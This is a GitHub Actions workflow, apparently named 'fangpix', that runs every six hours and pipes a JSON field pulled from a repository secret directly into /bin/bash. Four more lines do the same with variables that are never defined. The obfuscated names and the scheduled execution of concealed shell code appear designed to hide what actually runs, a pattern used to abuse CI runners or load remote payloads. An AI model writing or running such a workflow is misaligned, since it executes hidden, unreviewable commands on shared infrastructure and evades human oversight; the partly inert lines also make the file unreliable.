name: fangpix
on:
  workflow_dispatch:
  schedule:
    - cron: '7 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fangpix
        env:
          emc2: ${{ secrets.emc2 }}
        run: |
          echo $emc2 | jq -r .qvm72 | /bin/bash
          echo $hr8038 | jq -r .ur9057 | /bin/bash
          echo $v4 | jq -r .cuu794 | /bin/bash
          echo $ziwv4 | jq -r .log47578 | /bin/bash
          echo $mv2397 | jq -r .zpxz533 | /bin/bash

